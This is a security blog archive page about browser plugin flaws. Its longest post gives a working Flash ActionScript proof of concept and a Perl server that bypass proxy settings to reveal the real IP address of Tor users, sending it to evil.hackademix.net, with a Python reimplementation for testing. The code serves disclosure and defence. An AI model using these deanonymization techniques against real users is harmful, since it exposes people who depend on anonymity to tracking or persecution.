Archive for the Java Category

Just not to be always destructive, a couple of flash(!) news about browser plugins issues we discussed in the past:

  1. The “Quicktime pwns default browsers” bug, after being worked around by Mozilla with the release of Firefox 2.0.0.7, has been fixed on the proper Apple side. Even if the advisory page refers to a SEP 21 date, the actual software update has been published just now.
  2. The Java evil popups I demonstrated two months ago have been addressed by Sun.

On a side note, this Saturday I’m gonna get married.
Cheers :)

It’s really time to sleep in my timezone, but I just couldn’t resist when I read RSnake’s latest post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing works better than some scary demos to convert the non-believers.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect, and it apparently works only on Gecko-based browsers with Java™ installed. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser supporting the Flash player, Internet Explorer included (no need for JavaScript, either).
The XMLSocket ActionScript object is used to bypass the browser’s proxy settings and connect directly to a tiny server written in Perl, listening on port 9999 and echoing the client’s IP.

Here’s the ActionScript code:

    // Flash XMLSocket ignores the browser's proxy settings: this opens a raw TCP
    // connection straight from the client to the echo server.
    var socket = new XMLSocket();
    socket.onConnect = function(success) {
      if (!success) return;            // no direct route (e.g. outbound TCP blocked)
      socket.onXML = function(doc) {
        // doc is <ip>A.B.C.D</ip>: report the address the server saw, this time
        // via the browser, so this request goes through the proxy (if any)
        getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
               doc.firstChild.firstChild.nodeValue);
        socket.close();
      };
      socket.send(new XML());          // empty document: just the NUL terminator
    };
    socket.connect("evil.hackademix.net", 9999);

And here’s the Perl server:

    #!/usr/bin/perl -w
    use strict;
    use IO::Socket;   # also exports Socket's sockaddr_in, inet_ntoa and SOMAXCONN

    # Tiny echo server: answers every TCP client with its own address, framed the
    # way XMLSocket expects (an XML document terminated by a NUL byte).
    my $port = shift || 9999;
    my $sock = new IO::Socket::INET(
        LocalPort => $port,
        Proto     => 'tcp',
        Listen    => SOMAXCONN,
        Reuse     => 1);
    $sock or die "socket: $!";
    my ($new_sock, $c_addr);
    while (($new_sock, $c_addr) = $sock->accept()) {
        # accept() in list context also returns the peer's packed address
        my ($client_port, $client_ip) = sockaddr_in($c_addr);
        print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
        $new_sock->close();
    }
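As an added self-check (my code, not the post’s): the same exchange in Python, with the NUL-byte framing XMLSocket uses, an echo server you can run on a host you control, and a verdict helper that compares the address the socket server saw with the address your proxy presents (what the post’s HTTP beacon carries). Function names and the loopback self-test are mine; the addresses in the comments are constructed.

```python
import socket
import threading
import xml.etree.ElementTree as ET

def frame(xml_text):
    # XMLSocket framing: one UTF-8 XML document followed by a NUL byte.
    return xml_text.encode("utf-8") + b"\x00"

def read_message(sock):
    # Read one NUL-terminated message; the client's empty XML() is just b"\x00".
    buf = bytearray()
    while b"\x00" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed before the NUL terminator")
        buf.extend(chunk)
    return bytes(buf).split(b"\x00", 1)[0].decode("utf-8")

def serve_one(listener):
    # Accept one client and echo the address the raw TCP connection came from,
    # as <ip>A.B.C.D</ip>, the same document the Perl script above emits.
    conn, (peer_ip, _port) = listener.accept()
    with conn:
        read_message(conn)  # consume the client's empty request first
        conn.sendall(frame("<ip>%s</ip>" % peer_ip))

def probe(host, port):
    # Connect directly, as the plugin does, and return the address the server saw.
    with socket.create_connection((host, port)) as s:
        s.sendall(frame(""))
        return ET.fromstring(read_message(s)).text

def verdict(socket_ip, beacon_ip):
    # socket_ip: seen by this server; beacon_ip: the address your proxy presents
    # (e.g. the source a plain HTTP request through the proxy is logged from).
    return "LEAK" if socket_ip != beacon_ip else "ok"

def self_test():
    # Server and probe on loopback; the echoed address must then be 127.0.0.1.
    listener = socket.socket()
    listener.settimeout(5)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    worker = threading.Thread(target=serve_one, args=(listener,))
    worker.start()
    try:
        return probe("127.0.0.1", listener.getsockname()[1])
    finally:
        worker.join()
        listener.close()
```

Point the SWF (or any other plugin) at the server from behind your proxy: if the socket server logs your real address while a plain HTTP request through the proxy arrives from the proxy’s address, the plugin is bypassing the proxy.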

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this also works in browsers, like IE, that don’t support LiveConnect.
The lesson above obviously applies, even stronger.

Demos

Recent explosions of Petko D. Petkov (pdp)’s pwning lust should teach us a lesson: documents should be documents, not programs!

We’ve seen MP3 tunes pwning Firefox (and NoScript promptly counter-pwning), Windows playlists pwning browser security, and finally PDF documents pwning Windows PCs.
This latest “disclosure” sounds like a strange case of pwnatio precox, since Petko didn’t bother to reveal any detail about the flaw. All he said is

Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.

I’ve got no problem believing his words, since the stuff we keep calling “documents” became containers for all kinds of executable code a long time ago, either intentionally (script embedding) or by accident (buffer overflows, often due to an overly complex format driven by creeping featurism).

I (like many people, I guess) do have problems with his suggested work-around:

My advice for you is not to open any PDF files (locally or remotely).

This is something no business can afford, plain and simple.
The real fix would be vendors stopping these crazy mixes of data and code, but it’s something they don’t seem to be even considering.
So, how can we mitigate risks of this kind, which surely won’t go away even when Adobe fixes this specific PDF issue?

OK, I’m obviously biased here, but did you ever notice the NoScript Options/Advanced/Plugins panel?
(Screenshot: NoScript content blocking options)
It provides quite a flexible way to block Java, Flash, Silverlight and all the other plugins, such as Acrobat Viewer, Windows Media Player and QuickTime, just to name the ones featured in pdp’s research.
If you check all the Forbid... checkboxes but the last (IFRAMES), all types of plugin-handled, potentially dangerous content will be blocked by default when coming from unknown (and therefore untrusted) sites.
You’ll get a nice placeholder with the NoScript logo instead: you just click it, and you activate the content on the fly if you deem it trustworthy.
If you’re paranoid like me, you may want to trade some usability for maximum security and also check the Apply these restrictions to trusted sites too option, which mandates on-demand activation everywhere.

I heard someone saying security × usability = K.
If it’s true (and I hope some day it won’t necessarily be), NoScript tries hard to pump that K as high as it can be.

(Image: Caravaggio, San Gerolamo)
Both the Java Evil Popups and the more recent SQL Injection Toy posts have been followed by kind requests to see the code.

Furthermore, I routinely receive inquiries about the source code of my most known Firefox extensions (NoScript and FlashGot), sometimes from people graciously accusing me of infringing the GPL which covers both.

I believe the time has come to make them all happy, but…

Disclaimer

True hackers won’t read further, because the info above is more than enough to obtain all the mentioned source code in a few seconds ;)

Imagine you’re a web advertiser.
Imagine you can open a popup window from a web page defeating any popup blocker.
Imagine this popup can invade the whole desktop, full screen.
Imagine this popup has no title bar, no menus, no toolbar, no location bar, no border and no buttons. No means to close it.
Imagine the user can’t move or minimize this popup. It will go away only when the browser is killed or your show is done…

Now imagine you’re a phisher.
Imagine you can use this almighty popup to draw anything you want. A fake browser or — why not? — a whole fake desktop to collect the user’s data.

Impossible wet dreams of clueless evildoers?
No, it’s just 100% Pure Java™ Reality.

